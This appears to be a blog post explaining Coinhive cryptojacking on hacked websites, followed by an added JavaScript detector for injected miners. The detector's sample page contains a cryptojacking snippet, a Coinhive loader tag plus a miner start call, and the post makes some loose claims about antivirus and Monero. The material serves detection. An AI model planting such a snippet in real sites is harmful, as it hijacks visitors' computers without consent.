
Who And What Is Coinhive?

Saturday, May 5th, 2018

With the value of cryptocurrencies skyrocketing, hackers are continuously seeking ways to exploit web services owned by businesses. In this brouhaha, no one is spared. Government-owned websites, cloud service providers like Amazon, and even your own site could be hijacked by a cryptocurrency miner to mine currencies for free. There are many ways hackers are going after the cryptocurrency gold mine, but Coinhive will be the primary focus of this piece.

What is Coinhive?

Coinhive is a JavaScript cryptocurrency miner that has been continuously abused by hackers. Hackers exploit a vulnerability in a website so that every time someone views the site, it anonymously mines cryptocurrency by stealing the processing power of the web visitors. The cryptocurrency miner itself is legitimate software but has unfortunately been abused by hackers who are looking to earn a living to the detriment of unknown persons.

The JavaScript cryptocurrency mining service depends on a small chunk of computer code, created to be installed on websites. It works by using the processing power of any browser that visits the site, driving the visitor's machine to mine the Monero cryptocurrency. The general idea behind the software was to give website owners a way to make a living without resorting to intrusive adverts. However, shortly after its official release, Coinhive was ranked as a top malware threat.

What Happened?

Thousands of websites were hijacked by a cryptocurrency miner, making web visitors a tool to mine digital currencies. It was discovered that Coinhive was at the center of this misdemeanor. Mining cryptocurrencies consumes a lot of power, so why absorb so much and pile up your bills when you can have numerous people do the work for you? This was the case. The plugin allows websites to anonymously use visitors’ computing power to mine cryptocurrency. In this case, they mined Monero and not Bitcoin.

Why Monero, and not bitcoin, the King of cryptocurrencies?

Although Bitcoin is the most sought-after cryptocurrency, hackers prefer to mine Monero because transactions are virtually untraceable. Monero was created for the same purpose as Bitcoin: transactions occur without a central authority involved. Many people hold the common misconception that Bitcoin is an anonymous currency. This is not the case. Balances and transactions are connected to the users’ wallet addresses. As such, operations can be traced to wallet addresses, making it easy to track down hackers or criminals.

It is the contrary case with Monero. This cryptocurrency offers considerably more anonymity. Unlike blockchain wallets, Monero wallets are protected by viewkeys. This means that only the owners have access to their transactions, making it a safer and more discreet option for hackers. There is no way a third party can intercept transactions between two people.

Hacking Implications

This version of Coinhive runs without your knowledge, draining your system’s battery. It works in the background without notifications or permission from anyone. Aside from wasting your system’s battery, what other implications are there? As stated earlier, mining digital currencies consumes a lot of power and so can put your system in harm’s way without you detecting the cause of the problem. Some of the implications include:

  • Affecting your machine’s performance, making it run slower than expected. When the fans are kicking in and the hardware, the CPU in particular, is working more intensively than usual, the machine is bound to fail.
  • Damaging your device. Running at full speed all the time is not ideal for a machine, so you should be careful.
  • Outrageous power consumption, which will make your electricity bill skyrocket. This, in fact, is the principal reason hackers install these plugins to mine their digital currencies for them.

Worst of all, you don’t get to see the money because the hackers are diverting the currencies. In other words, you are an anonymous money-making machine for some unknown persons. They use your system and your power and still take the proceeds, leaving you with more bills to pay.

Is there a permanent Solution?

Hackers rely on loopholes in the system to perpetrate mayhem. The reason government-owned websites were hacked is that the hackers noticed a vulnerability or inadequacy in the system. A lot of people do not bother to protect their sites from internet fraudsters. It’s a wake-up call for website owners. The easiest way out is to install antivirus software or antimalware programs.

Regardless of how tech-savvy you are, you must ensure your system is equipped with suitable antivirus software to protect you from hackers. Remember, they use a backdoor to install the JavaScript plugin, which works in the background so you don’t notice. An excellent antivirus tool will detect the spyware and notify you with popups so you can proceed to block it from accessing your computer system.

Does Coinhive Benefit from The Hack?

This JavaScript cryptocurrency miner appears to benefit from the hack. It takes a 30% share of whatever amount is mined using its code. Although it was not intended to be exploited, Coinhive automatically takes a percentage every time an amount is mined, regardless of whether the site gave its authorization or not. The code has a unique cryptographic key that identifies the user who receives the other 70%. Little wonder that Coinhive has reportedly been slow to act.

What Measures Have Been Taken?

Coinhive accepts complaints reporting abuse but ignores grievances that do not come from hacked website owners. However, they respond to abuse complaints by nullifying the key tied to the abuse, and this does not provide a lasting solution. Instead, Coinhive begins to keep 100% of the digital currency linked to that account. The only ones losing out are the hacker and you. According to Mursch, invalidating a key does not automatically disrupt the mining process. The code keeps running in the background and Coinhive takes it all, leaving the hacker with nothing. In simpler terms, the problem remains the same: your system is still running at risk, and you still have a pile of electricity bills to pay.

As the case may be, Coinhive claims that the organization is working to fix the current situation. It stated in an email that a user cannot delete a site key and that they were currently working on a mechanism to disseminate the invalidation of a key to their WebSocket servers. In response to the criticism, it released code called “AuthedMine”, which will prompt miners to seek authorization from website owners before running the cryptocurrency mining script.
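
The abuse process above is tied to the site key embedded with the miner, so a website owner checking their own pages needs to find the loader and recover that key. The following is an added example, not code from the original post or from Coinhive: it scans page HTML for a plain, unobfuscated embed and separates the AuthedMine loader from the silent one. The sample pages and the key are constructed, and the loader URLs and `CoinHive.Anonymous` call are assumed to be the form found on the page being checked.

```javascript
// Added example: find an embedded Coinhive miner in page HTML and recover
// the site key. Assumes a plain, unobfuscated <script src> embed.
const LOADER_RE =
  /<script[^>]+src\s*=\s*["']?([^"'\s>]*(?:coinhive|coin-hive|authedmine)[^"'\s>]*)/gi;
const KEY_RE = /CoinHive\.\w+\s*\(\s*["']([A-Za-z0-9]+)["']/g;

function scanForCoinhive(html) {
  const loaders = [...html.matchAll(LOADER_RE)].map((m) => m[1]);
  const siteKeys = [...new Set([...html.matchAll(KEY_RE)].map((m) => m[1]))];
  // AuthedMine is the variant that asks first; any other loader, or a key
  // with no visible loader, is treated as mining without consent.
  const optInOnly =
    loaders.length > 0 && loaders.every((url) => /authedmine/i.test(url));
  let verdict = "clean";
  if (loaders.length > 0 || siteKeys.length > 0) {
    verdict = optInOnly ? "opt-in miner" : "silent miner";
  }
  return { verdict, loaders, siteKeys };
}

// Constructed sample pages; the key is a placeholder, not a real site key.
const SAMPLE_INJECTED = `
<html><body><h1>Council services</h1>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('CONSTRUCTEDKEY0000000000000000000');
  miner.start();
</script></body></html>`;

const SAMPLE_OPTIN = `
<html><body>
<script src="https://authedmine.com/lib/authedmine.min.js"></script>
<script>var miner = new CoinHive.Anonymous('CONSTRUCTEDKEY0000000000000000000');</script>
</body></html>`;

const SAMPLE_CLEAN = `
<html><body><p>An article that mentions coinhive in its text only.</p>
<script src="https://code.jquery.com/jquery.min.js"></script></body></html>`;

const samples = { SAMPLE_INJECTED, SAMPLE_OPTIN, SAMPLE_CLEAN };
for (const [name, html] of Object.entries(samples)) {
  console.log(name, JSON.stringify(scanForCoinhive(html)));
}
```

A "silent miner" verdict on a page you own means both removing the injected script and reporting the recovered key, since the post notes that an invalidated key does not stop the code from running.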